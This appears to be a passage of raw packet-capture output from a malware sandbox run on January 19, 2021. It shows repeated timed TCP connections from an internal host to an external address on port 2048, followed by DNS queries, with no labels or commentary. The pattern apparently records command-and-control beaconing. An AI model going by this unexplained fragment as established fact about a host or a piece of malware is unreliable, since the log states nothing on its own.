                                    Jan 19, 2021 17:15:29.965262890 CET204849796185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:30.077146053 CET497972048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:30.126117945 CET204849797185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:30.626650095 CET497972048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:30.675601959 CET204849797185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:31.178626060 CET497972048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:31.227519035 CET204849797185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:32.329123020 CET498002048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:32.377681971 CET204849800185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:32.878793001 CET498002048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:32.927510023 CET204849800185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:33.428754091 CET498002048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:33.477555990 CET204849800185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:33.565963984 CET498022048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:33.614444017 CET204849802185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:34.115859032 CET498022048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:34.164328098 CET204849802185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:34.665910959 CET498022048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:34.714492083 CET204849802185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:35.811852932 CET498042048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:35.860477924 CET204849804185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:36.361994028 CET498042048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:36.410567045 CET204849804185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:36.914000988 CET498042048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:36.963051081 CET204849804185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:37.074404955 CET498052048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:37.123290062 CET204849805185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:37.623876095 CET498052048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:37.673569918 CET204849805185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:38.175116062 CET498052048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:38.223603964 CET204849805185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:39.318526983 CET498072048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:39.367028952 CET204849807185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:39.869663000 CET498072048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:39.918488979 CET204849807185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:40.419255018 CET498072048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:40.467592955 CET204849807185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:40.547131062 CET498092048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:40.595822096 CET204849809185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:41.096285105 CET498092048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:41.145519972 CET204849809185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:41.646441936 CET498092048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:41.698337078 CET204849809185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:42.793126106 CET498102048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:42.842196941 CET204849810185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:43.343494892 CET498102048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:43.392118931 CET204849810185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:43.893548012 CET498102048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:43.942442894 CET204849810185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:44.038311958 CET498112048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:44.086797953 CET204849811185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:44.589669943 CET498112048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:44.638458014 CET204849811185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:45.138654947 CET498112048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:45.187437057 CET204849811185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:46.288197041 CET498122048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:46.336991072 CET204849812185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:46.836740017 CET498122048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:46.885701895 CET204849812185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:47.386907101 CET498122048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:47.435523033 CET204849812185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:47.547933102 CET498132048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:47.596868038 CET204849813185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:48.099875927 CET498132048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:48.148515940 CET204849813185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:48.654910088 CET498132048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:48.703871012 CET204849813185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:50.545908928 CET498142048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:50.594855070 CET204849814185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:51.099102974 CET498142048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:51.149003983 CET204849814185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:51.649154902 CET498142048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:51.697978973 CET204849814185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:51.790765047 CET498152048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:51.839683056 CET204849815185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:52.341197968 CET498152048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:52.389939070 CET204849815185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:52.890201092 CET498152048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:52.939223051 CET204849815185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:54.063055038 CET498162048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:54.111851931 CET204849816185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:54.612349033 CET498162048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:54.661020041 CET204849816185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:55.161433935 CET498162048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:07.267087936 CET498172048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:07.315836906 CET204849817185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:07.824282885 CET498172048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:07.872931957 CET204849817185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:08.373500109 CET498172048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:08.422473907 CET204849817185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:09.530867100 CET498182048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:09.579762936 CET204849818185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:10.079441071 CET498182048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:10.129074097 CET204849818185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:10.629468918 CET498182048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:10.678231955 CET204849818185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:10.825434923 CET498192048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:10.874412060 CET204849819185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:11.375587940 CET498192048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:11.424299002 CET204849819185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:11.925585985 CET498192048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:11.974176884 CET204849819185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:13.115726948 CET498202048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:13.164551973 CET204849820185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:13.665899992 CET498202048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:13.717793941 CET204849820185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:14.218739033 CET498202048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:14.268801928 CET204849820185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:14.362066031 CET498212048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:14.411828995 CET204849821185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:14.912787914 CET498212048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:14.961750031 CET204849821185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:15.462830067 CET498212048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:15.511442900 CET204849821185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:16.617645979 CET498222048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:16.666311026 CET204849822185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:17.170968056 CET498222048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:17.219676971 CET204849822185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:17.722001076 CET498222048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:17.770651102 CET204849822185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:17.877038956 CET498232048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:17.925705910 CET204849823185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:18.428086042 CET498232048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:18.477061987 CET204849823185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:18.978523970 CET498232048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:19.027163029 CET204849823185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:20.140363932 CET498242048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:20.190323114 CET204849824185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:20.691201925 CET498242048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:20.742654085 CET204849824185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:21.244249105 CET498242048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:21.293541908 CET204849824185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:21.394563913 CET498252048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:21.443830967 CET204849825185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:21.945322037 CET498252048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:21.994193077 CET204849825185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:22.497345924 CET498252048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:22.546097994 CET204849825185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:23.645859003 CET498262048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:23.694377899 CET204849826185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:24.195456028 CET498262048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:24.244297028 CET204849826185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:24.745487928 CET498262048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:24.794419050 CET204849826185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:24.898195982 CET498272048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:24.947168112 CET204849827185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:25.449575901 CET498272048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:25.498455048 CET204849827185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:26.001635075 CET498272048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:26.051074982 CET204849827185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:27.160579920 CET498282048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:27.209265947 CET204849828185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:27.710757971 CET498282048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:27.759711027 CET204849828185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:28.260755062 CET498282048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:28.309521914 CET204849828185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:28.431725979 CET498292048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:28.480865002 CET204849829185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:28.982815027 CET498292048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:29.031583071 CET204849829185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:29.533844948 CET498292048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:29.582804918 CET204849829185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:30.710798025 CET498302048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:30.759699106 CET204849830185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:31.266053915 CET498302048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:31.314723969 CET204849830185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:31.816133022 CET498302048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:31.864936113 CET204849830185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:31.986588955 CET498312048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:32.035357952 CET204849831185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:32.536149979 CET498312048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:32.584968090 CET204849831185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:33.086185932 CET498312048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:33.135014057 CET204849831185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:34.267292976 CET498322048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:34.315853119 CET204849832185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:34.818244934 CET498322048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:34.867136002 CET204849832185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:35.369282007 CET498322048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:35.421201944 CET204849832185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:35.538539886 CET498332048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:35.587181091 CET204849833185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:36.089318037 CET498332048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:36.138000965 CET204849833185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:36.639357090 CET498332048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:36.688285112 CET204849833185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:37.839185953 CET498342048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:37.887875080 CET204849834185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:38.389497042 CET498342048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:38.438075066 CET204849834185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:38.939562082 CET498342048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:38.988430977 CET204849834185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:39.114140034 CET498352048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:39.162856102 CET204849835185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:39.663616896 CET498352048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:39.712542057 CET204849835185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:40.213654041 CET498352048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:40.262459040 CET204849835185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:41.370666027 CET498362048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:41.421585083 CET204849836185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:41.922739029 CET498362048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:41.971318960 CET204849836185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:42.471807003 CET498362048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:42.521040916 CET204849836185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:42.640964985 CET498372048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:42.690661907 CET204849837185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:43.191869020 CET498372048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:43.241532087 CET204849837185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:43.742932081 CET498372048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:43.791527987 CET204849837185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:44.898953915 CET498382048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:44.947829008 CET204849838185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:45.450001001 CET498382048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:45.498862028 CET204849838185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:46.000051022 CET498382048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:46.049122095 CET204849838185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:46.156135082 CET498392048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:46.205017090 CET204849839185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:46.706207037 CET498392048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:46.755491018 CET204849839185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:47.257232904 CET498392048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:47.305886030 CET204849839185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:48.406121969 CET498402048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:48.454880953 CET204849840185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:48.956327915 CET498402048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:49.005206108 CET204849840185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:49.515371084 CET498402048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:49.564280987 CET204849840185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:49.622981071 CET498412048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:49.671555042 CET204849841185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:50.171363115 CET498412048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:50.220213890 CET204849841185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:50.721426010 CET498412048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:50.770067930 CET204849841185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:51.821049929 CET498422048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:51.869987965 CET204849842185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:16:52.372054100 CET498422048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:16:52.421493053 CET204849842185.140.53.253192.168.2.4

                                    UDP Packets

                                    Jan 19, 2021 17:14:49.550054073 CET53615318.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:49.821460962 CET4922853192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:49.885998011 CET53492288.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:50.204355955 CET5979453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:50.252202988 CET53597948.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:50.634546995 CET5591653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:50.682677031 CET53559168.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:50.708967924 CET5275253192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:50.773046970 CET53527528.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:50.952425003 CET6054253192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:51.014060020 CET53605428.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:51.776447058 CET6068953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:51.832902908 CET53606898.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:52.201205015 CET6420653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:52.257812977 CET53642068.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:52.861074924 CET5090453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:52.922400951 CET53509048.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:54.148149967 CET5752553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:54.209078074 CET53575258.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:54.446244001 CET5381453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:54.496059895 CET53538148.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:55.638669968 CET5341853192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:55.690269947 CET6283353192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:55.700361967 CET53534188.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:55.746643066 CET53628338.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:56.515439987 CET5926053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:56.574630022 CET53592608.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:58.136776924 CET4994453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:58.197926998 CET53499448.8.8.8192.168.2.4
                                    Jan 19, 2021 17:14:59.487055063 CET6330053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:14:59.548501015 CET53633008.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:01.789062023 CET6144953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:01.845561981 CET53614498.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:03.039455891 CET5127553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:03.095740080 CET53512758.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:03.356487036 CET6349253192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:03.407774925 CET53634928.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:03.575505972 CET5894553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:03.647437096 CET53589458.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:05.269073963 CET6077953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:06.307902098 CET6401453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:06.311877966 CET6077953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:06.368491888 CET53607798.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:06.373554945 CET53640148.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:07.562407970 CET5709153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:07.610485077 CET53570918.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:09.798381090 CET5590453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:09.849160910 CET53559048.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:11.032475948 CET5210953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:11.093702078 CET53521098.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:11.847198009 CET5445053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:11.895070076 CET53544508.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:13.283751965 CET4937453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:13.325629950 CET5043653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:13.343240023 CET53493748.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:13.373994112 CET53504368.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:14.540656090 CET6260553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:14.597177029 CET53626058.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:17.596970081 CET5425653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:17.655365944 CET53542568.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:22.760082960 CET5218953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:22.808008909 CET53521898.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:28.757800102 CET5613153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:28.815994978 CET53561318.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:30.019778013 CET6299253192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:30.076164007 CET53629928.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:31.292248964 CET5443253192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:31.343381882 CET53544328.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:32.084727049 CET5722753192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:32.135871887 CET53572278.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:32.265638113 CET5838353192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:32.326874018 CET53583838.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:32.952282906 CET6313653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:33.000319004 CET53631368.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:33.506709099 CET5091153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:33.564708948 CET53509118.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:35.407144070 CET6340953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:35.457967997 CET53634098.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:35.753662109 CET5918553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:35.809885979 CET53591858.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:37.014866114 CET6423653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:37.073565960 CET53642368.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:37.626287937 CET5615753192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:37.677510023 CET53561578.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:39.257890940 CET5560153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:39.317043066 CET53556018.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:39.366555929 CET5298453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:39.427902937 CET53529848.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:40.498341084 CET5114153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:40.546051025 CET53511418.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:42.731714010 CET5361053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:42.791768074 CET53536108.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:43.980668068 CET6124753192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:44.036858082 CET53612478.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:46.222735882 CET6516553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:46.287039042 CET53651658.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:47.490364075 CET5207653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:47.547096968 CET53520768.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:50.469167948 CET5490353192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:50.533364058 CET53549038.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:51.730165958 CET5504553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:51.789258957 CET53550458.8.8.8192.168.2.4
                                    Jan 19, 2021 17:15:53.997497082 CET5446453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:15:54.061994076 CET53544648.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:07.202050924 CET5097053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:07.266206980 CET53509708.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:09.467921972 CET5526153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:09.529237032 CET53552618.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:10.766552925 CET5980953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:10.823873997 CET53598098.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:13.058108091 CET5127853192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:13.114248037 CET53512788.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:14.301039934 CET5193253192.168.2.48.8.8.8
